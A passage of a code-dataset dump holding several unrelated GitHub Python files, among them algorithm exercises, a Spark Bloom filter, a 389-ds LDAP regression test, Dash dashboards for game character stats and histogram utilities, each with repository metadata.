mid +1 \n return \"right\"\n else:\n hi = mid - 1\n return \"left\"\n\n return binary_search_rotation(0,len(nums)-1,condition)\n\n\ndef evaluate_test_case(test_function, tests):\n num = 0\n passed = 0\n failed = 0\n for test in tests:\n print(test['input']['nums'])\n \n if test['output'] == test_function(test['input']['nums']):\n print(f'##### Test Case {num} #####')\n print('STATUS: PASSED')\n \n passed +=1\n else:\n print(f'##### Test Case {num} #####')\n print('STATUS: FAILED')\n failed += 1\n print(\"Expected Output: \",test['output'])\n print(\"Output: \",test_function(test['input']['nums']),\"\\n \\n \\n\")\n num += 1\n \n return f'*******Test Result*******\\n Total:{num}\\n Passed:{passed}\\n Failed:{failed}'\n\n\n\n\ntest0 = {\n 'input': {\n 'nums': [19, 25, 29, 3, 5, 6, 7, 9, 11, 14]\n },\n 'output': 3\n}\n\n# A list of size 8 rotated 5 times.\ntest1 = {\n 'input': {\n 'nums': [4,5,6,7,8,1,2,3]\n },\n 'output': 5\n}\n# A list that wasn't rotated at all.\ntest2 = {\n 'input': {\n 'nums': [10,12,45,50,100,550,1234,2000]\n },\n 'output': -1\n}\n\n# A list that was rotated just once.\ntest3 = {\n 'input': {\n 'nums': [2000, 20,45,64,355,503,708]\n },\n 'output': 1\n}\n\n# A list that was rotated n-1 times, where n is the size of the list.\ntest4 = {\n 'input': {\n 'nums': [20,42,52,56,345,635,823,5634,6452,4]\n },\n 'output': 9\n}\n# A list that was rotated n times, where n is the size of the list\ntest5 = {\n 'input': {\n 'nums': [23,42,43,45,62,66,72,76,86,132]\n },\n 'output': -1\n}\n# An empty list.\ntest6 = {\n 'input': {\n 'nums': []\n },\n 'output': -1\n}\n# A list containing just one element.\ntest7 = {\n 'input': {\n 'nums': [4]\n },\n 'output': -1\n}\n\ntest8={\n 'input': {\n 'nums': [14,20,4,5,6,6,6,7,7,8,10]\n },\n 'output': 2\n}\ntest9 = {\n 'input': {\n 'nums': [14,20,4,5,6,6,7,7,8,10]\n },\n 'output': 2\n}\n\ntest10 = {\n 'input': {\n 'nums': [20,20,20,1,2,5,7,13,19]\n },\n 'output': 3\n}\n\ntest11 = {\n 'input': {\n 'nums': [20,20]\n },\n 'output': -1\n}\n\ntest12 = {\n 'input': {\n 'nums': [40,51,1,3,6,9,14,18,20,20]\n },\n 'output': 2\n}\n\n\ntests = [test0, test1, test2,test3, test4, test5, test6, test7, test8,test9, test10,test11, test12]\n#Irrelevant\n# if __name__ == '__main__':\n# print('Initiating program')\n# password = getpass.getpass(prompt=\"Enter Your Password \\n\")\n\n# if password == 'ceejay':\n# print(\"Access Granted\")\n# print(evaluate_test_case(count_rotations_generic, tests))\n# else:\n# print('Wrong Credentials')","repo_name":"shady-cj/Py-algo","sub_path":"testbinarySearch.py","file_name":"testbinarySearch.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13418299108","text":"import pandas as pd\nfrom math import floor\n\nfrom constants import SIMULATION_MONEY\nfrom constants import STOP_LOSS\nfrom constants import DELTA_ORIGIN\nfrom constants import PER_TRADE_AMT\n\nclass trader:\n money = 0\n buyLimited = False #true if can't buy stock due to inadequate funds\n lossesStopped = 0\n wins = 0\n losses = 0\n totalTrades = 0\n\n def __init__(self):\n self.money = SIMULATION_MONEY\n\n def trade(self, buyDataRow, sellDataRow):\n #check funds\n if buyDataRow[DELTA_ORIGIN] > self.money:\n self.buyLimited = True\n return\n #buy turn\n sharesAmt = floor(PER_TRADE_AMT / buyDataRow[DELTA_ORIGIN])\n boughtShares = 0\n while sharesAmt > 0 and self.money >= buyDataRow[DELTA_ORIGIN] :\n self.money -= buyDataRow[DELTA_ORIGIN]\n sharesAmt -= 1\n boughtShares 
+= 1\n        if boughtShares == 0:\n            return\n        #stop loss turn (the empty-string column name is a placeholder left in the original code)\n        if DELTA_ORIGIN == \"\" and buyDataRow[\"\"] <= buyDataRow[DELTA_ORIGIN] * (1 - (STOP_LOSS / 100)):\n            # sell every bought share at the stop price; parentheses fixed so the whole\n            # price is scaled by (1 - STOP_LOSS/100) rather than only the constant 1\n            self.money += buyDataRow[DELTA_ORIGIN] * (1 - (STOP_LOSS / 100)) * boughtShares\n            self.lossesStopped += 1\n            self.losses += 1\n            self.totalTrades += 1\n            return\n        if DELTA_ORIGIN == \"\" and sellDataRow[\"\"] <= sellDataRow[DELTA_ORIGIN] * (1 - (STOP_LOSS / 100)):\n            self.money += sellDataRow[DELTA_ORIGIN] * (1 - (STOP_LOSS / 100)) * boughtShares\n            self.lossesStopped += 1\n            self.losses += 1\n            self.totalTrades += 1\n            return\n        #sell turn\n        self.money += sellDataRow[DELTA_ORIGIN] * boughtShares\n        #logging\n        if buyDataRow[DELTA_ORIGIN] < sellDataRow[DELTA_ORIGIN]:\n            self.wins += 1\n        elif buyDataRow[DELTA_ORIGIN] > sellDataRow[DELTA_ORIGIN]:\n            self.losses += 1\n        self.totalTrades += 1\n\n    def getWinRate(self):\n        # guard against division by zero before any trade has completed\n        if self.totalTrades == 0:\n            return 0.0\n        return round((self.wins / self.totalTrades) * 100, 2)\n","repo_name":"Tom-Lieber/stockmoves","sub_path":"trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72612523608","text":"# -*- coding: utf-8 -*-\nfrom functools import wraps\nfrom interface.helpers.logger import ConsoleLogger as Log\n\n\ndef wrapper(method):\n    @wraps(method)\n    def method_wrapper(*args, **kwargs):\n        try:\n            rsp, error, message, http_code = method(*args, **kwargs)\n        except Exception as e:\n            rsp = []\n            error = e.__class__.__name__\n            message = e.__str__()\n            http_code = 500\n            Log().output(e)\n        finally:\n            return rsp, error, message, http_code\n    return method_wrapper\n","repo_name":"dev-lusaja/python-boilerplate","sub_path":"app/interface/rest/decorators/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"3058310180","text":"from robot_parts.legs import *\nimport time\nimport os\n\nservo.connect()\n\n# initialize legs and servos\nleg_count = 4\nlegs = []\nfor i in range(leg_count):\n\tn = i * 2 + i + 1\n\tlegs.append(leg(n, n+1, n+2))\n\tlegs[i].a.torqueOff()\n\tlegs[i].b.torqueOff()\n\tlegs[i].c.torqueOff()\n\ntry:\n\twhile True:\n\t\tos.system(\"clear\")\n\t\tfor i in range(leg_count):\n\t\t\tprint(f\"({legs[i].a.getAngle()}, {legs[i].b.getAngle()}, {legs[i].c.getAngle()})\")\n\t\ttime.sleep(0.5)\nexcept KeyboardInterrupt:\n\tprint(\"Ctrl + C pressed...\")\n\nservo.close()\n","repo_name":"Robot-Builders-Team-University-of-Idaho/Quad_Walker_Bot","sub_path":"src/read_angles.py","file_name":"read_angles.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72288533847","text":"from pyspark import SparkContext, SparkConf\nimport json\nimport random\nimport sys\nimport time\nfrom binascii import hexlify\n\nstartTime = time.time()\n\nconf = SparkConf().setMaster(\"local[*]\").set(\"spark.executor.memory\", \"4g\").set(\"spark.driver.memory\", \"4g\")\nsc = SparkContext(conf=conf)\n\ninput_file_path_first = sys.argv[1] #r'business_first.json'\ninput_file_path_second = sys.argv[2] # r'business_second.json'\noutput_file_path = sys.argv[3] #r'task1_output.csv'\n\ncity_int = (sc.textFile(input_file_path_first) # read file\n            .map(lambda line:json.loads(line)) # convert each line to json object\n            .map(lambda jLine:jLine['city']) # keep only the city field\n            .filter(lambda city:len(city)!=0) # filter out the empty city\n            .map(lambda 
cityStr:int(hexlify(cityStr.encode('utf8')), 16)) # convert city string to an integer\n            .distinct() # remove duplicate city\n            .collect()\n           )\n\ndef makePrediction(city):\n    if len(city) == 0:\n        return 0\n    else:\n        cityStr = int(hexlify(city.encode('utf8')), 16)\n        return predict(cityStr)\n\ndef predict(cityInt):\n    # a city is reported as "seen" only if every hash position is set;\n    # this can yield false positives but never false negatives\n    if all(calculateHashedValue(a, b, len_bit_array, cityInt) in bloom_filter for a, b in zip(a_list, b_list)):\n        return 1\n    else:\n        return 0\n\ndef calculateHashedValue(a, b, m, x):\n    return (a * x + b) % m\n\ndef generateHashFunc(num_func):\n    param_a_list = random.sample(range(1, sys.maxsize - 1), num_func)\n    param_b_list = random.sample(range(0, sys.maxsize - 1), num_func)\n    \n    return param_a_list, param_b_list\n\ndef buildBloomFilter(city_int_list, len_bit_array, param_a_list, param_b_list):\n    # bloom filter is not actually a list full of 0's and 1's, instead is represented as a set of indices\n    # if there is an 1 in pos i, then add i to the set. If a pos is not in the set, then it's a 0\n    bloom_filter = set()\n    \n    param_m = len_bit_array\n    for city_int in city_int_list:\n        for param_a, param_b in zip(param_a_list, param_b_list):\n            hashed = calculateHashedValue(param_a, param_b, param_m, city_int)\n            bloom_filter.add(hashed)\n    return bloom_filter\n    \n# build the bloom filter using list of stream element\nnum_func = 2\n# m: the size of the (virtual) bit array; with n insertions and k hash functions\n# the false-positive rate is roughly (1 - e^(-k*n/m))^k\nlen_bit_array = 10000\na_list, b_list = generateHashFunc(num_func)\nbloom_filter = buildBloomFilter(city_int, len_bit_array, a_list, b_list)\n\nprediction = (sc.textFile(input_file_path_second) # read file\n              .map(lambda line:json.loads(line)) # convert each line to json object\n              .map(lambda jLine:jLine['city']) # keep only the city field\n              .map(lambda cityStr:makePrediction(cityStr)) \n              .collect()\n             )\n\noutput_file = open(output_file_path, 'w')\noutput_file.write(' '.join([str(cityInt) for cityInt in prediction]))\noutput_file.close()\n\nprint('Duration:', str(time.time()-startTime))\n
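\n# Added sanity-check sketch ('_self_check' is illustrative and not part of the\n# original job): since a Bloom filter may report false positives but never\n# false negatives, every element inserted at build time must test positive.\ndef _self_check():\n    sample = [int(hexlify(c.encode('utf8')), 16) for c in ('Boston', 'Paris')]\n    bf = buildBloomFilter(sample, len_bit_array, a_list, b_list)\n    assert all(calculateHashedValue(a, b, len_bit_array, x) in bf\n               for x in sample for a, b in zip(a_list, b_list))\n\n\n","repo_name":"artisan1218/Streaming-Data-Algo","sub_path":"Bloom Filter.py","file_name":"Bloom Filter.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6750921426","text":"from django.conf.urls import url\nfrom . 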
import views\n\nurlpatterns = [\n url(r'^place/$', views.index, name='list1'),\n url(r'^findlocal/$', views.findlocalindex, name='findlocals'),\n url(r'^dangjin/', views.dangjinindex, name='dangjinindex'),\n url(r'^incheon/', views.incheonindex, name='incheonindex'),\n url(r'^paju/', views.pajuindex, name='pajuindex'),\n url(r'^yangpyeong/', views.yangpyeongindex, name='yangpyeongindex'),\n url(r'^asan/', views.asanindex, name='asanindex'),\n url(r'^andong/', views.andongindex, name='andongindex'),\n #url(r'^place/$', include('traveler.urls')),\n]\n","repo_name":"sosomii/nalzababa0","sub_path":"traveler/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40909111706","text":"# Making class for the node of linked list\nclass Node:\n\n # Each node have a value and a reference(default to None) to the next node in the list\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nd = Node('D') # Pointing to None (meaning last node of the list(tail node))\nc = Node('C', d) # Having value of 'C' and pointing to next node d\nb = Node('B', c)\na = Node('A', b)\n\n\ndef linked_list_to_array_loop(head):\n current = head\n array = []\n\n while (current != None):\n array.append(current.val)\n current = current.next\n return array\n\n\narr = linked_list_to_array_loop(a)\nprint(arr)\n\n\ndef find_values(head, array):\n if (head == None):\n return\n\n array.append(head.val)\n find_values(head.next, array)\n\n\ndef linked_list_to_array_recursion(head):\n array = []\n find_values(head, array)\n return array\n\n\narr2 = linked_list_to_array_recursion(a)\nprint(arr2)\n","repo_name":"RocTanweer/python_dsa","sub_path":"linkedList/operations/toArray/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13404703851","text":"import time\nimport ldap\nimport logging\nimport pytest\nfrom lib389 import Entry\nfrom lib389._constants import *\nfrom lib389.properties import *\nfrom lib389.tasks import *\nfrom lib389.utils import *\nfrom lib389.topologies import topology_st as topo\n\npytestmark = pytest.mark.tier2\n\nDEBUGGING = os.getenv(\"DEBUGGING\", default=False)\nif DEBUGGING:\n logging.getLogger(__name__).setLevel(logging.DEBUG)\nelse:\n logging.getLogger(__name__).setLevel(logging.INFO)\nlog = logging.getLogger(__name__)\n\nINDEX_DN = 'cn=index,cn=Second_Backend,cn=ldbm database,cn=plugins,cn=config'\nSUFFIX_DN = 'cn=Second_Backend,cn=ldbm database,cn=plugins,cn=config'\nMY_SUFFIX = \"o=hang.com\"\nUSER_DN = 'uid=user,' + MY_SUFFIX\n\n\ndef test_ticket49192(topo):\n \"\"\"Trigger deadlock when removing suffix\n \"\"\"\n\n #\n # Create a second suffix/backend\n #\n log.info('Creating second backend...')\n topo.standalone.backends.create(None, properties={\n BACKEND_NAME: \"Second_Backend\",\n 'suffix': \"o=hang.com\",\n })\n try:\n topo.standalone.add_s(Entry((\"o=hang.com\", {\n 'objectclass': 'top organization'.split(),\n 'o': 'hang.com'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to create 2nd suffix: error ' + e.args[0]['desc'])\n assert False\n\n #\n # Add roles\n #\n log.info('Adding roles...')\n try:\n topo.standalone.add_s(Entry(('cn=nsManagedDisabledRole,' + MY_SUFFIX, {\n 'objectclass': ['top', 'LdapSubEntry',\n 'nsRoleDefinition',\n 'nsSimpleRoleDefinition',\n 'nsManagedRoleDefinition'],\n 'cn': 
'nsManagedDisabledRole'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add managed role: error ' + e.args[0]['desc'])\n assert False\n\n try:\n topo.standalone.add_s(Entry(('cn=nsDisabledRole,' + MY_SUFFIX, {\n 'objectclass': ['top', 'LdapSubEntry',\n 'nsRoleDefinition',\n 'nsComplexRoleDefinition',\n 'nsNestedRoleDefinition'],\n 'cn': 'nsDisabledRole',\n 'nsRoledn': 'cn=nsManagedDisabledRole,' + MY_SUFFIX})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add nested role: error ' + e.args[0]['desc'])\n assert False\n\n try:\n topo.standalone.add_s(Entry(('cn=nsAccountInactivationTmp,' + MY_SUFFIX, {\n 'objectclass': ['top', 'nsContainer'],\n 'cn': 'nsAccountInactivationTmp'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add container: error ' + e.args[0]['desc'])\n assert False\n\n try:\n topo.standalone.add_s(Entry(('cn=\\\"cn=nsDisabledRole,' + MY_SUFFIX + '\\\",cn=nsAccountInactivationTmp,' + MY_SUFFIX, {\n 'objectclass': ['top', 'extensibleObject', 'costemplate',\n 'ldapsubentry'],\n 'nsAccountLock': 'true'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add cos1: error ' + e.args[0]['desc'])\n assert False\n\n try:\n topo.standalone.add_s(Entry(('cn=nsAccountInactivation_cos,' + MY_SUFFIX, {\n 'objectclass': ['top', 'LdapSubEntry', 'cosSuperDefinition',\n 'cosClassicDefinition'],\n 'cn': 'nsAccountInactivation_cos',\n 'cosTemplateDn': 'cn=nsAccountInactivationTmp,' + MY_SUFFIX,\n 'cosSpecifier': 'nsRole',\n 'cosAttribute': 'nsAccountLock operational'})))\n except ldap.LDAPError as e:\n log.fatal('Failed to add cos2 : error ' + e.args[0]['desc'])\n assert False\n\n #\n # Add test entry\n #\n try:\n topo.standalone.add_s(Entry((USER_DN, {\n 'objectclass': 'top extensibleObject'.split(),\n 'uid': 'user',\n 'userpassword': 'password',\n })))\n except ldap.LDAPError as e:\n log.fatal('Failed to add user: error ' + e.args[0]['desc'])\n assert False\n\n #\n # Inactivate the user account\n #\n try:\n topo.standalone.modify_s(USER_DN,\n [(ldap.MOD_ADD,\n 'nsRoleDN',\n ensure_bytes('cn=nsManagedDisabledRole,' + MY_SUFFIX))])\n except ldap.LDAPError as e:\n log.fatal('Failed to disable user: error ' + e.args[0]['desc'])\n assert False\n\n time.sleep(1)\n\n # Bind as user (should fail)\n try:\n topo.standalone.simple_bind_s(USER_DN, 'password')\n log.error(\"Bind incorrectly worked\")\n assert False\n except ldap.UNWILLING_TO_PERFORM:\n log.info('Got error 53 as expected')\n except ldap.LDAPError as e:\n log.fatal('Bind has unexpected error ' + e.args[0]['desc'])\n assert False\n\n # Bind as root DN\n try:\n topo.standalone.simple_bind_s(DN_DM, PASSWORD)\n except ldap.LDAPError as e:\n log.fatal('RootDN Bind has unexpected error ' + e.args[0]['desc'])\n assert False\n\n #\n # Delete suffix\n #\n log.info('Delete the suffix and children...')\n try:\n index_entries = topo.standalone.search_s(\n SUFFIX_DN, ldap.SCOPE_SUBTREE, 'objectclass=top')\n except ldap.LDAPError as e:\n log.error('Failed to search: %s - error %s' % (SUFFIX_DN, str(e)))\n\n for entry in reversed(index_entries):\n try:\n log.info(\"Deleting: \" + entry.dn)\n if entry.dn != SUFFIX_DN and entry.dn != INDEX_DN:\n topo.standalone.search_s(entry.dn,\n ldap.SCOPE_ONELEVEL,\n 'objectclass=top')\n topo.standalone.delete_s(entry.dn)\n except ldap.LDAPError as e:\n log.fatal('Failed to delete entry: %s - error %s' %\n (entry.dn, str(e)))\n assert False\n\n log.info(\"Test Passed\")\n\n\nif __name__ == '__main__':\n # Run isolated\n # -s for DEBUG mode\n CURRENT_FILE = os.path.realpath(__file__)\n 
pytest.main(\"-s %s\" % CURRENT_FILE)\n\n","repo_name":"389ds/389-ds-base","sub_path":"dirsrvtests/tests/tickets/ticket49192_test.py","file_name":"ticket49192_test.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"31022315470","text":"from dash import dcc\nfrom dash import html\nfrom dash.dependencies import Input, Output\nimport pandas as pd\nimport plotly.express as px\n\n# Stat columns, to be used for ordering:\nSTAT_COLS = ['HP', 'Str', 'Mag', 'Dex', 'Spd', 'Def', 'Res', 'Lck', 'Bld']\n\n\ndef bar_buttons(df):\n # Create the character drop down menus:\n character_dropdown_1 = dcc.Dropdown(\n id='character-1-dropdown',\n options=[{'label': name, 'value': name} for name in df['Name'].unique()],\n value=df['Name'].unique()[0]\n )\n character_dropdown_2 = dcc.Dropdown(\n id='character-2-dropdown',\n options=[{'label': name, 'value': name} for name in df['Name'].unique()],\n value=df['Name'].unique()[1]\n )\n\n # Create the level slider button:\n level_slider = dcc.Slider(\n id='level-slider',\n min=df['int_lev'].min(),\n max=df['int_lev'].max(),\n step=1,\n value=df['int_lev'].min(),\n marks={i: str(i) for i in range(df['int_lev'].min(), df['int_lev'].max() + 1)}\n )\n\n # Create the class dropdowns:\n class_dropdown_1 = dcc.Dropdown(\n id='class-dropdown-1'\n )\n\n class_dropdown_2 = dcc.Dropdown(\n id='class-dropdown-2'\n )\n\n buttons = [character_dropdown_1, character_dropdown_2, class_dropdown_1, class_dropdown_2, level_slider]\n\n return buttons\n\n\ndef bar_layout(app, buttons):\n # Define the app layout\n app.layout = html.Div([\n dcc.Graph(id='metric-chart'),\n html.Div([\n # Add the character dropdowns\n html.Div([\n html.Label('Character 1'),\n buttons[0]\n ], style={'width': '40%', 'display': 'inline-block', 'padding-left': '50px', 'padding-right': '50px'}),\n\n html.Div([\n html.Label('Character 2'),\n buttons[1]\n ], style={'width': '40%', 'display': 'inline-block'}),\n ], style={'width': '100%', 'display': 'inline-block'}),\n\n html.Div([\n # Add the class dropdowns\n html.Div([\n html.Label('Class 1'),\n buttons[2]\n ], style={'width': '40%', 'display': 'inline-block', 'padding-left': '50px', 'padding-right': '50px'}),\n\n html.Div([\n html.Label('Class 2'),\n buttons[3]\n ], style={'width': '40%', 'display': 'inline-block'}),\n ], style={'width': '100%', 'display': 'inline-block'}),\n\n html.Div([\n html.Label('Internal Level', style={'text-align': 'center'}),\n buttons[4]\n ], style={'padding-top': '20px', 'text-align': 'center'})\n ])\n\n return app\n\n\ndef bar_callbacks(app, df):\n @app.callback(\n [Output('level-slider', 'min'),\n Output('level-slider', 'value')],\n [Input('character-1-dropdown', 'value'),\n Input('character-2-dropdown', 'value')]\n )\n def update_slider_min_and_value(character_name_1, character_name_2):\n min_level_1 = df[df['Name'] == character_name_1]['int_lev'].min()\n min_level_2 = df[df['Name'] == character_name_2]['int_lev'].min()\n min_level = max(min_level_1, min_level_2)\n return min_level, min_level\n\n # Define the callback to update the class dropdowns\n @app.callback(\n [Output('class-dropdown-1', 'options'),\n Output('class-dropdown-1', 'value'),\n Output('class-dropdown-2', 'options'),\n Output('class-dropdown-2', 'value')],\n [Input('character-1-dropdown', 'value'),\n Input('character-2-dropdown', 'value')]\n )\n def update_class_dropdowns(character_name_1, character_name_2):\n # Get the list of available classes for the 
selected character\n class_options_1 = [{'label': c, 'value': c} for c in df[df['Name'] == character_name_1]['Promo_Class'].unique()]\n class_options_2 = [{'label': c, 'value': c} for c in df[df['Name'] == character_name_2]['Promo_Class'].unique()]\n\n # Return the options for both dropdowns, and set the default value to the first class in the list\n return class_options_1, class_options_1[0]['value'], class_options_2, class_options_2[0]['value']\n\n # Define the callback to update the chart\n @app.callback(\n Output('metric-chart', 'figure'),\n [Input('character-1-dropdown', 'value'),\n Input('character-2-dropdown', 'value'),\n Input('level-slider', 'value'),\n Input('class-dropdown-1', 'value'),\n Input('class-dropdown-2', 'value'),\n ]\n )\n def update_metric_chart(character_name_1, character_name_2, level, class_name_1, class_name_2):\n # Filter the dataframe to include the selected characters and classes at the given level\n filt_df = df[(df['Name'].isin([character_name_1, character_name_2])) &\n (df['int_lev'] == level) &\n (df['Promo_Class'].isin([class_name_1, class_name_2]))]\n\n # Return the characters current class (may be different from eventual promotion):\n curr_class1 = filt_df.loc[(filt_df['Name'] == character_name_1) & (filt_df['Promo_Class'] == class_name_1\n )]['Class'].reset_index(drop=True)[0]\n curr_class2 = filt_df.loc[(filt_df['Name'] == character_name_2) & (filt_df['Promo_Class'] == class_name_2\n )]['Class'].reset_index(drop=True)[0]\n\n # If characters have same name, add class to name so bar chart differentiates between them:\n if (character_name_1 == character_name_2) & (class_name_1 != class_name_2):\n filt_df.loc[(filt_df['Name'] == character_name_1) & (filt_df['Promo_Class'] == class_name_1\n ), 'Name'] = '%s (%s)' % (\n character_name_1, class_name_1)\n filt_df.loc[(filt_df['Name'] == character_name_2) & (filt_df['Promo_Class'] == class_name_2\n ), 'Name'] = '%s (%s)' % (\n character_name_2, class_name_2)\n\n # Re-order to ensure correct ordering of bar chart corresponding to drop down selectors:\n filt_df['Metric'] = pd.Categorical(filt_df['Metric'], STAT_COLS)\n if class_name_1 != class_name_2:\n filt_df['Promo_Class'] = pd.Categorical(filt_df['Promo_Class'], [class_name_1, class_name_2])\n filt_df = filt_df.sort_values(['Metric', 'Promo_Class'])\n\n # Create the bar chart using Plotly Express\n fig = px.bar(filt_df, x='Metric', y='Value', color='Name', barmode='group') # , color_discrete_map=color_dict\n\n # Update the chart title and axis labels\n fig.update_layout(\n title=f'{character_name_1} ({curr_class1}) vs. 
{character_name_2} ({curr_class2}) at Level {level}')\n        fig.update_layout(title_x=0.5)\n        fig.update_xaxes(title='Metric')\n        fig.update_yaxes(title='Value')\n\n        return fig\n\n    return app\n\n\ndef scatter_buttons(df):\n    x_dropdown = dcc.Dropdown(\n        id='x-axis',\n        options=[{'label': i, 'value': i} for i in df['Metric'].unique()],\n        value='HP'\n    )\n    y_dropdown = dcc.Dropdown(\n        id='y-axis',\n        options=[{'label': i, 'value': i} for i in df['Metric'].unique()],\n        value='Str'\n    )\n    slider = dcc.Slider(\n        id='level-slider',\n        min=df['int_lev'].min(),\n        max=df['int_lev'].max(),\n        step=1,\n        value=df['int_lev'].min(),\n        marks={str(level): str(level) for level in df['int_lev'].unique()}\n    )\n\n    return [x_dropdown, y_dropdown, slider]\n\n\ndef scatter_layout(app, buttons):\n    # Define the layout\n    app.layout = html.Div([\n        dcc.Graph(id='scatterplot'),\n        html.Div([\n            # Add the metric dropdowns\n            html.Div([\n                buttons[0]\n            ], style={'width': '40%', 'display': 'inline-block', 'padding-left': '50px', 'padding-right': '50px'}),\n\n            html.Div([\n                buttons[1]\n            ], style={'width': '40%', 'display': 'inline-block'}),\n        ], style={'width': '100%', 'display': 'inline-block'}),\n\n        html.Div([\n            html.Label('Internal Level', style={'text-align': 'center'}),\n            buttons[2]\n        ], style={'padding-top': '20px', 'text-align': 'center'})\n    ])\n\n    return app\n\n\ndef scatter_callbacks(app, df):\n    # Define the callback to update the scatterplot\n    @app.callback(\n        Output('scatterplot', 'figure'),\n        Input('x-axis', 'value'),\n        Input('y-axis', 'value'),\n        Input('level-slider', 'value')\n    )\n    def update_scatterplot(x_axis, y_axis, level):\n        filtered_df = df[df['int_lev'] == level]\n        x_df = filtered_df[filtered_df['Metric'] == x_axis].rename(columns={'Value': x_axis})\n        y_df = filtered_df[filtered_df['Metric'] == y_axis].rename(columns={'Value': y_axis})\n        merged_df = x_df.merge(y_df, on=['Name', 'int_lev', 'Class', 'Promo_Class'])\n\n        fig = px.scatter(merged_df, x=x_axis, y=y_axis,\n                         color='Name', hover_data=['Name', 'Promo_Class', x_axis, y_axis])\n\n        fig.update_layout(transition_duration=500)\n        return fig\n\n    return app","repo_name":"williamdee1/Fire_Emblem","sub_path":"modules/dash_viz.py","file_name":"dash_viz.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17106310630","text":"def magic_index(array, start, end):\n    # guard added: without it the left-hand recursion below never\n    # terminates when no magic index exists\n    if start > end:\n        return -1\n    mid_index = (start + end) // 2\n    print((\"array:{0}\").format(array))\n    print((\"midindex:{0}\").format(mid_index))\n    if array[mid_index] == mid_index:\n        return mid_index\n    elif mid_index > array[mid_index]:\n        return magic_index(array, mid_index+1, end)\n    else:\n        # mid_index itself is already ruled out, so exclude it from the range\n        return magic_index(array, start, mid_index-1)\n\n\ndef magic_index_distinct(array, start, end):\n    if end < start:\n        return -1\n    mid_index = (start + end) // 2\n    mid_value = array[mid_index]\n    if array[mid_index] == mid_index:\n        return mid_index\n    left_index = min(mid_index-1, mid_value)\n    left = magic_index_distinct(array, start, left_index)\n    # print(left)\n    # compare against the -1 sentinel: the original 'if left:' wrongly\n    # discarded a magic index found at position 0 (0 is falsy)\n    if left != -1:\n        return left\n    right_index = max(mid_index+1, mid_value)\n    right = magic_index_distinct(array, right_index, end)\n    return right\n\n\nif __name__ == \"__main__\":\n    # array = [-40, -20, -1, 1, 2, 3, 5, 7, 9, 12, 13]\n\n    # print(magic_index(array, start, end))\n    array = [-10, -5, 2, 2, 2, 3, 4, 7, 9, 12, 13]\n    start = 0\n    end = len(array)-1\n    print(magic_index_distinct(array, start, 
end))\n","repo_name":"xiaolinangela/cracking-the-coding-interview-soln","sub_path":"Ch8_RecursionDP/8.3-MagicIndex.py","file_name":"8.3-MagicIndex.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30307189728","text":"def hola2(a):\n    # count the divisors of a+1 that are at most (a+1)//2; a+1 is prime\n    # exactly when this count is 1 (only the divisor 1)\n    divisores=0\n    mitadE=(a+1)//2\n    for i in range(1, mitadE+1):\n        if (a+1)%i==0:\n            divisores=divisores+1\n\n\n    if divisores<2 and a%6!=0:\n        print(\"it is a cousin prime\")  # 'primo hermano' in the original Spanish\n    else:\n        print(\"it is not a cousin prime\") \n\nx=int(input(\"The number to test is: \"))\nhola2(x)","repo_name":"julife12/rdygu","sub_path":"primohermano.py","file_name":"primohermano.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22574644847","text":"'''\nCreated on 20 Nov 2012\n\n@author: kreczko\n'''\nfrom __future__ import division\nfrom rootpy.plotting import Hist, Graph\nfrom rootpy import asrootpy\nfrom ROOT import TGraphAsymmErrors\nfrom array import array\nfrom itertools import izip\nfrom rootpy.plotting.hist import Hist2D\nimport random\nimport string\nfrom math import sqrt\nfrom copy import deepcopy\nfrom .file_utilities import read_data_from_JSON\nfrom .logger import log\nhu_log = log[\"tools/hist_utilities\"]\n\ndef hist_to_value_error_tuplelist( hist ):\n    values = list( hist.y() )\n    errors = []\n    add_error = errors.append\n    get_bin_error = hist.GetBinError\n    for bin_i in range( len( values ) ):\n        add_error( get_bin_error( bin_i + 1 ) )\n    return zip( values, errors )\n\ndef hist_to_value_list( hist ):\n    values = list( hist.y() )\n    return values\n\ndef hist_to_binEdges_list( hist ):\n    edges = list(hist.xedges())\n    return edges\n\ndef hist2d_to_binEdges_list( hist ):\n    xedges = list(hist.xedges())\n    yedges = list(hist.yedges())\n    return xedges, yedges\n\ndef values_and_errors_to_hist( values, errors, bins ):\n    assert( len( bins ) == len( values ) + 1 )\n    if len( errors ) == 0:\n        errors = [0.] 
